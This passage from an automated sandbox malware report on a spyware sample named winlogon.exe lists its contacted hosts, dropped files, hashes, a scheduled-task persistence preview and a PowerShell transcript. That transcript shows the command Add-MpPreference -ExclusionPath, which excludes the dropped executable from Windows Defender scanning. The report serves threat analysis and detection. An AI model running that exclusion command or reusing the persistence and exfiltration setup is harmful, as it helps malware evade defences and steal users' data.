                          http://127.0.0.1:HTTP/1.1RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://smtp.stockmeieir.comRegSvcs.exe, 00000006.00000002.929285525.0000000002A52000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://wwHpow.comRegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://Qr1QL48h5BTOb.comRegSvcs.exe, 00000006.00000002.929225214.0000000002A03000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000002.929273138.0000000002A4C000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.ipify.org%GETMozilla/5.0RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		low
                          http://DynDns.comDynDNSRegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://us2.smtp.mailhostbox.comRegSvcs.exe, 00000006.00000002.929285525.0000000002A52000.00000004.00000001.sdmpfalse
                            		high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewinlogon.exe, 00000000.00000002.676484155.0000000002CB3000.00000004.00000001.sdmp, winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmpfalse
                              		high
                              https://api.ipify.org%RegSvcs.exe, 00000006.00000002.929145314.00000000029AC000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		low
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipwinlogon.exe, 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000006.00000000.672598413.0000000000402000.00000040.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              208.91.199.224
                              		us2.smtp.mailhostbox.comUnited States
                              		394695PUBLIC-DOMAIN-REGISTRYUSfalse

                              Private

                              IP
                              192.168.2.1

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:532921
                              Start date:02.12.2021
                              Start time:20:21:14
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 8m 25s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:winlogon.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:18
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@9/8@2/2
                              EGA Information:Failed
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              20:22:08API Interceptor1x Sleep call for process: winlogon.exe modified
                              20:22:12API Interceptor40x Sleep call for process: powershell.exe modified
                              20:22:23API Interceptor826x Sleep call for process: RegSvcs.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              208.91.199.224Dhl Document.exeGet hashmaliciousBrowse
                                hkpg4iBhY1.exeGet hashmaliciousBrowse
                                  PO_783992883.exeGet hashmaliciousBrowse
                                    Payment copy $95,914.38MT103_0987658999643PDF.exeGet hashmaliciousBrowse
                                      Details To Be Reconfirmed.docGet hashmaliciousBrowse
                                        03SPwb995m.exeGet hashmaliciousBrowse
                                          PAGO DEL SALDO.docGet hashmaliciousBrowse
                                            MT_1O1_SWIFt.docGet hashmaliciousBrowse
                                              Reconfirm The Details.docGet hashmaliciousBrowse
                                                Document.exeGet hashmaliciousBrowse
                                                  MT_101_SWIFT.docGet hashmaliciousBrowse
                                                    ORDER INQUIRY-PVP-SP-2021-58.exeGet hashmaliciousBrowse
                                                      DOC221121.exeGet hashmaliciousBrowse
                                                        TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                          AWB Number 0004318855.DOCX.exeGet hashmaliciousBrowse
                                                            Purchase Order.exeGet hashmaliciousBrowse
                                                              ORDER INQUIRY-PVP-SP-2021-56.exeGet hashmaliciousBrowse
                                                                PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                  vYeUxRnIbLKDudo.exeGet hashmaliciousBrowse
                                                                    DHL Documentos de envio originales.exeGet hashmaliciousBrowse

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      us2.smtp.mailhostbox.comDhl Document 7348255141.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      Dhl Document.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      DHL Waybill receipt.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      DHL SHIPMENT NOTIFICATION 284748395PD.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      Swift MT103 pdf.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      Scan096355.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      yYa94CeATF8h2NA.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      PG4636 - Confirmed .xls.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      PG4636 - Confirmed .xls.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      BOQ.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      RFQ-Spares and tools.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      CARTASCONF.xlsxGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      Documento de env.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      hkpg4iBhY1.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      account details and invoice.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      justificantepago_es_180208779493.xlsxGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      winlogon.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      PO_783992883.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      OUTWARD SWIFT-103 MSG Payment Transcript.PDF.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      ROfr29tilpUhTHx.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      PUBLIC-DOMAIN-REGISTRYUSDhl Document 7348255141.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      TNT Documents.exeGet hashmaliciousBrowse
                                                                      • 119.18.54.99
                                                                      Dhl Document.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      DHL Waybill receipt.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      Shipping Document BL Copy.exeGet hashmaliciousBrowse
                                                                      • 103.195.185.115
                                                                      DHL SHIPMENT NOTIFICATION 284748395PD.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      SHIPPING DOCUMENT & PL.exeGet hashmaliciousBrowse
                                                                      • 103.195.185.115
                                                                      Swift MT103 pdf.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      Scan096355.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      yYa94CeATF8h2NA.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      part-1500645108.xlsbGet hashmaliciousBrowse
                                                                      • 103.76.231.42
                                                                      part-1500645108.xlsbGet hashmaliciousBrowse
                                                                      • 103.76.231.42
                                                                      item-40567503.xlsbGet hashmaliciousBrowse
                                                                      • 162.215.254.201
                                                                      item-40567503.xlsbGet hashmaliciousBrowse
                                                                      • 162.215.254.201
                                                                      PG4636 - Confirmed .xls.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      item-107262298.xlsbGet hashmaliciousBrowse
                                                                      • 162.215.254.201
                                                                      item-107262298.xlsbGet hashmaliciousBrowse
                                                                      • 162.215.254.201
                                                                      item-1202816963.xlsbGet hashmaliciousBrowse
                                                                      • 162.215.254.201
                                                                      item-1202816963.xlsbGet hashmaliciousBrowse
                                                                      • 162.215.254.201
                                                                      DHL Receipt.htmlGet hashmaliciousBrowse
                                                                      • 199.79.62.126

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exejustificantepago_es_180208779494.xlsxGet hashmaliciousBrowse

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\winlogon.exe.log
                                                                        Process:C:\Users\user\Desktop\winlogon.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:modified
                                                                        Size (bytes):1310
                                                                        Entropy (8bit):5.345651901398759
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                                                                        MD5:D918C6A765EDB90D2A227FE23A3FEC98
                                                                        SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                                                                        SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                                                                        SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                                                                        Malicious:true
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):22320
                                                                        Entropy (8bit):5.602598488027755
                                                                        Encrypted:false
                                                                        SSDEEP:384:StCDm0QsEdEY7SlxRgS0nUjultIi77Y9gFSJ3x6T1MaPZlbAV77FvOZBDI+9zg:l/sTUClt9fFcACOfwPIV4
                                                                        MD5:AA1D3E3546DF44DAE5F48413437EDBE4
                                                                        SHA1:5C5AE47F753AA6EAE575C7C9750D76BAB26EBD5B
                                                                        SHA-256:E0CFFE057ABB82AEE8350F87A2D10B3F4C838767B04847B858D1E7AB25F6B7D3
                                                                        SHA-512:591B822BEA9032C0A33BAE648B34BB993B60D22A49D0A70C01750F21575A1C1842B06A4AF0C1ED52C9112058775AD6C5F602782E7AD96999B6F42C1E851F3E41
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: @...e...................h.p...........M...I..........@..........H...............<@.^.L."My...:U..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gbn1r51.3xf.ps1
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview: 1
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brqhmx13.5q1.psm1
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview: 1
                                                                        C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp
                                                                        Process:C:\Users\user\Desktop\winlogon.exe
                                                                        File Type:XML 1.0 document, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1599
                                                                        Entropy (8bit):5.139934532028239
                                                                        Encrypted:false
                                                                        SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaTxvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTIv
                                                                        MD5:69054F2C960937C174E7410ABB925255
                                                                        SHA1:ED6E69491A37FFA722743420727CE92B37D7C122
                                                                        SHA-256:F2BACD6A1A1788FF112806BC7D1AEE8A1468C881ED71096151A72FDF38F1D7B2
                                                                        SHA-512:8A96CEDF8600A43B044A76E3164BABD9260D2C0F1CBE4FC9448C945E4FF91143512D7DE3B6A1FC153A99EF5C12AC4981894C01A1F8D5B5AFF5FAE32BAB237C33
                                                                        Malicious:true
                                                                        Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                                        C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe
                                                                        Process:C:\Users\user\Desktop\winlogon.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):473600
                                                                        Entropy (8bit):7.814013296316778
                                                                        Encrypted:false
                                                                        SSDEEP:12288:Tu39J++7isfbzaXkpbWiVSDZynHjqRpfJ2Wfi/Srws:TutJ++7lzzkCUZSHjqff9fi6r
                                                                        MD5:629F5BB8B5EE75E90C393AD9D96A1772
                                                                        SHA1:B09925A7163BEF858657A1B39146FE27ABB01F99
                                                                        SHA-256:15637F2D530662C968272C1E6E48CA6A093F0C828EDF0CBB5CD32D9AF03B3FF5
                                                                        SHA-512:3434C0B1F42533C42A4232809A007DDFD340EBC0D500DB436CD038E3D3B4AAF0FD8BCF36E3A1CEE4442C5D894679F5CDC7CEF5A90C04534F937121D6CC9E3857
                                                                        Malicious:true
                                                                        Joe Sandbox View:
                                                                        • Filename: justificantepago_es_180208779494.xlsx, Detection: malicious, Browse
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....hO...............0..0...........N... ...`....@.. ....................................@.................................tN..O....`..............................XN............................................... ............... ..H............text........ ...0.................. ..`.rsrc........`.......2..............@..@.reloc...............8..............@..B.................N......H.......@E..........X....s..`............................................0...........(.......s....}.....{....r...p.o......{....r...p.o......s2...}.....(....{...........s....o......(....{...........s....o......(....o....&*....0............{.....+..*.0............{.....+..*&...}....*....(....o5...}......(....o3...}.....(.....*...0..Q..........r...pr...p.{.....{....s.....{....s?...(......(....o....&.(....o............-.*....0..e........(........}......{.....{....s....}......++..
                                                                        C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe:Zone.Identifier
                                                                        Process:C:\Users\user\Desktop\winlogon.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):26
                                                                        Entropy (8bit):3.95006375643621
                                                                        Encrypted:false
                                                                        SSDEEP:3:ggPYV:rPYV
                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                        Malicious:false
                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                        C:\Users\user\Documents\20211202\PowerShell_transcript.506013.Hm7BnSFA.20211202202210.txt
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):5797
                                                                        Entropy (8bit):5.390476094744057
                                                                        Encrypted:false
                                                                        SSDEEP:96:BZ+jbNZqDo1ZuZajbNZqDo1Z25bRjZqjbNZqDo1ZSNohhWjZUa:z
                                                                        MD5:ADA12A7BE4CD5E6A7CD39358076285E4
                                                                        SHA1:A7F4AB45E34FC800EE46D2D44C97E5190ED03D54
                                                                        SHA-256:79BAB3A013939F122B176E38C0B68B121F8B6BA5850818ACCEDE73838B3F6A40
                                                                        SHA-512:993858A2B3F9EF8388D64B745AE3AC46712231D27BCA9D932CB101C1E188FF41CC88BC192D0B4413A496AB7343FC02BFDB8C896D4C0644D90B87D9DC6010ABC2
                                                                        Malicious:false
                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20211202202211..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 506013 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe..Process ID: 6968..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211202202211..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe..**********************..Windows PowerShell transcript start..Start time: 20211202202538..Username: computer\user..RunAs User: computer\

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.814013296316778
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:winlogon.exe
                                                                        File size:473600
                                                                        MD5:629f5bb8b5ee75e90c393ad9d96a1772
                                                                        SHA1:b09925a7163bef858657a1b39146fe27abb01f99
                                                                        SHA256:15637f2d530662c968272c1e6e48ca6a093f0c828edf0cbb5cd32d9af03b3ff5
                                                                        SHA512:3434c0b1f42533c42a4232809a007ddfd340ebc0d500db436cd038e3d3b4aaf0fd8bcf36e3a1cee4442c5d894679f5cdc7cef5a90c04534f937121d6cc9e3857
                                                                        SSDEEP:12288:Tu39J++7isfbzaXkpbWiVSDZynHjqRpfJ2Wfi/Srws:TutJ++7lzzkCUZSHjqff9fi6r
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....hO...............0..0...........N... ...`....@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:00828e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x474ec6
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0xE54F68FF [Thu Nov 29 14:58:07 2091 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:v4.0.30319
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74e740x4f.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x760000x514.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x780000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x74e580x1c.text
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

